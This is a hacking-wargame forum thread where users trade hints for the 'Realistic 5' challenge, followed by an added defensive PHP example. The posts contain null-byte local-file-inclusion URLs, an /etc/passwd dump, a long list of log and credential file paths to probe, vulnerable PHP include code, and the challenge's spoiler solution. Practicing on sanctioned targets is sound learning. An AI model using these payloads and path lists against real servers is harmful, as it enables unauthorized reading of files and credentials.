ThisisLegal.com

ThisisLegal Forums

Welcome to the forums! A chance for site members to chat and get help.


#26 2011-02-28 03:01:24

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Realistic 5

you are on the right track phcoder, although pup is javascript, so why not just see where it is taking you to?


Site admin

Offline

#27 2012-03-23 17:32:36

strongard110
Member
Registered: 2012-03-05
Posts: 22

Re: Realistic 5

I need help. I tried null byte poisoning and I got access to the etc/passwd file (root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x....) but I cannot find the password as it is shadowed. I searched in all other files like etc/profiles, etc/services, bin/bash but I found nothing. What am I missing??? Any hint would be appreciated, I am really stuck.

Offline

#28 2012-03-24 05:36:39

phcoder
Member
Registered: 2011-02-09
Posts: 32

Re: Realistic 5

look at what the javascript pup(img) does.... that's how I figured it out

Offline

#29 2012-03-24 06:39:47

dariusmare
Member
Registered: 2012-03-20
Posts: 40

Re: Realistic 5

I tried MS Access Blind and I get some Tables and Rows but still I can't get the password :|


If i helped you please press the Thanks Button under my Profile Actually press (look left)

Offline

#30 2012-03-25 01:26:39

phcoder
Member
Registered: 2011-02-09
Posts: 32

Re: Realistic 5

[spoiler] the password is inside a file, you just need to make the website open that file using null byte [/spoiler]

I don't think I can say more than that w/o spoiling it completely....one more thing [spoiler]just look at the source code and try to find "pup(img)" [/spoiler]

Offline

#31 2012-03-25 03:54:36

dariusmare
Member
Registered: 2012-03-20
Posts: 40

Re: Realistic 5

I tried anything like this:
http://www.thisislegal.com/nc/details.php?p=../../adm/login.pwd%00
http://www.thisislegal.com/nc/details.php?p=adm/login.pwd%00
http://www.thisislegal.com/nc/details.php?p=adm/login%00.pwd
etc.

but it still doesn't work :|



Offline

#32 2012-03-25 15:00:21

strongard110
Member
Registered: 2012-03-05
Posts: 22

Re: Realistic 5

"the password is inside a file, you just need to make the website open that file using null byte "

I know that the password is inside a file, but how do I get this file? I am really stuck.

just look at the source code and try to find "pup(img)"

I had already done it before you posted your message to help me

href="javascript:pup('images/server')

and here is the script


function pup(img) {

var URL = "i.php?img=";
var URL2 = URL + img;


day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(URL2,  '" + id + "', '

All this function does is pop up the box in which there is the image of the server. This technique in javascript is used for publicity, to make the photo seem big in each full version. Sorry, I did not get how this pup(img) will help me find the password.

Besides, I tried a lot of directories with null byte.

I tried all these:

login.pwd



/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/wtmp
/etc/utmp
...
/opt/lampp/logs/error_log
/opt/lampp/logs/access_log
...
/var/log/lastlog
/var/log/telnetd
/var/run/utmp
/var/log/secure
/var/log/wtmp
/var/run/utmp
/var/log
/var/adm
/var/apache/log
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/acct
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/error.log
/var/log/apache-ssl/access.log
/var/log/auth.log
/var/log/xferlog
/var/log/message
/var/log/messages
/var/log/proftpd/xferlog.legacy
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/httpsd/ssl.access_log
/etc/mail/access
/var/log/qmail
/var/log/smtpd
/var/log/samba
/var/log/samba-log.%m
/var/lock/samba
/root/.Xauthority
/var/log/poplog
/var/log/news.all
/var/log/spooler
/var/log/news
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/thttpd_log
/var/log/ncftpd/misclog.txt
/var/log/ncftpd.errs
/var/log/auth
/var/log/kern.log
/var/log/cron.log
/var/log/maillog
/var/log/qmail/
/var/log/httpd/
/var/log/lighttpd
/var/log/boot.log
/var/log/mysqld.log
/var/log/secure
/var/log/utmp
/var/log/wtmp
/var/log/yum.log
/var/spool/tmp
/var/spool/errors
/var/spool/logs
/var/spool/locks
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/error.log
/var/www/logs/error_log
/var/www/logs/access_log
...
/root/.ksh_history
/root/.bash_history
/root/.bash_logut

...
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/error.log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log


The file in which there is the password is login.pwd, but it gives only an error opening the file when I try null byte, or I get a blank page.

ANOTHER MORE IMPORTANT THING THAT I HOPE YOU PHPCODER TO EXPLAIN TO ME

There is no password in etc/passwd and it gives no information that helps me find the password, so why is it used in this challenge if it is useless? In a REAL hacking of a website server in Google, if I am able to get the etc/passwd this means that I can use what we call the SERVER ROOTING technique to become root and deface the website
but when www.thisislegal.com is sanitized against this technique

I am a noob, a beginner, and my experience of hacking is only 4 months. I need help in this challenge.

Offline

#33 2012-03-25 16:37:28

phcoder
Member
Registered: 2011-02-09
Posts: 32

Re: Realistic 5

@dariusmare, you have got the right file, but you are injecting the wrong php....
[spoiler] details.php won't open it for u [/spoiler]

@strongard110, please do not shout at me! I'm not the admin for the site nor am I the author of this challenge or any other for that matter.

Offline

#34 2012-03-25 19:44:06

gixxygamma
Member
Registered: 2012-03-25
Posts: 2

Re: Realistic 5

Well I got into the login.pwd file, now I think I need to decrypt? John the Ripper isn't helping though....

Offline

#35 2012-03-29 13:14:16

strongard110
Member
Registered: 2012-03-05
Posts: 22

Re: Realistic 5

I tried

http://www.thisislegal.com/nc/i.php?img=login.pwd%00
http://www.thisislegal.com/nc/i.php?img=adm/login.pwd%00
There are only two .php files (details and i) in the site, no other php file except these two is found, and I tried to do the null byte to see the content of login.pwd as it is the right file that contains the password.

I do this with i.php as follows:

http://www.thisislegal.com/nc/i.php?img=login.pwd%00
http://www.thisislegal.com/nc/i.php?img=adm/login.pwd%00

but it gives me nothing, only error opening file. It gives me error opening file because I do not have administrator privilege to open the file, as I do not have privilege to open etc/shadow ... the only file I can access is etc/passwd.
I tried different options as I put in my last message but I got nothing.
I call on the person who made this challenge for people to solve and I call on tommy9 the administrator to give me a hint about how I can solve this challenge.
I searched in every inch of the site. I tried with http header, tamper data, but nothing works. I read the forum many times, I read the tutorial and articles many times. I tried LFI, I tried RFI, directory traversal, NULL BYTE INJECTION. I tried to inject the source code like that:

<?PHP
if($_GET['page']=='home') include 'home.php';
else include('pages/'.$_GET['page']); // here is the vulnerability
?>

<?PHP
if($_GET['page']=='home') include 'home.php';
else include($_GET['page'].'.php'); // here is the vulnerability
?>
how the hell should I solve this challenge???
any help will be appreciated

Offline
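
An added example, not part of any post and not the challenge's own code: a hardened lookup for a file-name parameter like the i.php?img= one discussed in this thread, as the counterpart to the include() patterns quoted in the post above. The function name resolve_image, the allowed extensions and the demo directory tree are assumptions made for illustration.

```php
<?php
// Added example (hypothetical): safe resolution of a user-supplied image name.
// resolve_image(), ALLOWED_EXT and the demo tree are assumptions, not site code.
const ALLOWED_EXT = ['png', 'jpg', 'gif'];

// Return the canonical path of an image inside $baseDir, or null to refuse.
function resolve_image(string $baseDir, string $name): ?string
{
    // 1. A NUL byte never belongs in a file name. Older PHP releases passed
    //    the string to C file APIs that stop at NUL, so a suffix appended by
    //    the script (for example ".jpg") was silently dropped.
    if (strpos($name, "\0") !== false) {
        return null;
    }
    // 2. Allowlist the extension of the name as supplied.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // 3. Canonicalise, then require the result to stay under the base directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo tree: images/ is public, adm/ is not.
$root = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir("$root/images", 0700, true);
mkdir("$root/adm", 0700, true);
file_put_contents("$root/images/server.jpg", 'jpeg-bytes');
file_put_contents("$root/adm/login.pwd", 'placeholder');
file_put_contents("$root/adm/backup.jpg", 'jpeg-bytes');

// Constructed requests, covering each of the three checks.
$requests = ['server.jpg', "../adm/login.pwd\0", "../adm/login.pwd\0.jpg",
             '../adm/login.pwd', '../adm/backup.jpg'];
foreach ($requests as $r) {
    $ok = resolve_image("$root/images", $r);
    printf("%-28s %s\n", addcslashes($r, "\0"), $ok === null ? 'refused' : 'served');
}
```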

#36 2012-03-31 06:13:53

orion
Member
Registered: 2012-03-19
Posts: 57

Re: Realistic 5

hey I found the login page but I cheated. I saw it in someone's post. other than that idk what to do at all


wHeNInDOubTrOllOUt!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!biggrin

Offline

#38 2012-04-02 16:31:11

phcoder
Member
Registered: 2011-02-09
Posts: 32

Re: Realistic 5

[spoiler]"http://www.thisislegal.com/nc/i.php?img=adm/login.pwd%00" works for me, I can't understand why it doesn't work for you...[/spoiler]

Offline

#39 2012-04-04 11:25:30

strongard110
Member
Registered: 2012-03-05
Posts: 22

Re: Realistic 5

phcoder, I want to say sorry if I shouted at you. I did not mean to be rude, excuse my impoliteness. I was only very nervous, and my nervosity is justified today; I had reason to be nervous as the link in the challenge site was broken,
and what justifies my words is the following:

A few weeks ago when I put http://www.thisislegal.com/nc/i.php?img=adm/login.pwd%00, a green page came up in which was written "error opening file"; now the same link gives me the password. I lost 1 month in this very easy challenge, not because of a misconcentration, not because of a technical weakness, not because of the absence of emotional content, but because the challenge was broken. It made me suffer a lot. Anyway, thank you very much phcoder.

Another thing: your hint gives the solution, DELETE IT PLEASE AND DELETE MY MESSAGE. I call on the administrators, please delete the hint of phcoder and my post, they give away a lot.

Offline

#40 2012-06-22 10:21:26

pinkyPink
Member
Registered: 2012-06-22
Posts: 2

Re: Realistic 5

which decryptor

Offline

#41 2012-06-22 10:26:49

pinkyPink
Member
Registered: 2012-06-22
Posts: 2

Re: Realistic 5

sorry. I'm a little drunk. Found it

Offline

#42 2012-06-22 10:33:14

pogo
Member
Registered: 2012-03-27
Posts: 46

Re: Realistic 5

pinkyPink: it is just encoded, not encrypted. The biggest hint would be the equal signs towards the right.

Offline

#43 2012-07-06 12:57:58

Mavvo
Member
Registered: 2012-07-06
Posts: 1

Re: Realistic 5

@strongard110 well actually your nervosity is not justified by what u suppose was a broken challenge.
Actually the error message was still your fault:
If u tried something different just before the right try, then what u get is the previous link with the %00 plus your right answer with the %00 at the end. Let me explain with an example (sorry for my super bad English):
1st try:
- http://www.thisislegal.com/nc/i.php?img=adm/login%00.pwd
- press enter
- after the page is loaded u have in the address bar: http://www.thisislegal.com/nc/i.php?img=adm/login.pwd THAT'S NOT CORRECT, if u look carefully u can see in the title bar that it still has: http://www.thisislegal.com/nc/i.php?img=adm/login%00.pwd
- so if u now try http://www.thisislegal.com/nc/i.php?img=adm/login.pwd%00 (supposed to be the right answer) u instead are getting: http://www.thisislegal.com/nc/i.php?img=adm/login%00.pwd%00 that is: http://www.thisislegal.com/nc/i.php?img=adm/login! not correct.
- if u now try http://www.thisislegal.com/nc/i.php?img=adm/login.pwd%00
tada correct!

Offline

#44 2013-05-27 10:30:42

Backbite
Member
Registered: 2013-04-26
Posts: 66

Re: Realistic 5

which decryptor

see "=="

It is
[spoiler] *a*e64[/spoiler]

Offline

#45 2014-07-22 02:49:25

Abhi_hacker
Member
Registered: 2014-07-22
Posts: 1

Re: Realistic 5

Hey guys, can someone help me here? I can't find the page where I have to enter the login details!! Thanks in advance

Offline

#46 2017-03-28 12:22:45

sheldon21grd
Member
Registered: 2017-03-28
Posts: 1

Re: Realistic 5

url based hacking

Offline

#47 2017-03-30 05:23:51

DillonShaw
Member
Registered: 2017-03-30
Posts: 6

Re: Realistic 5

hi

Offline
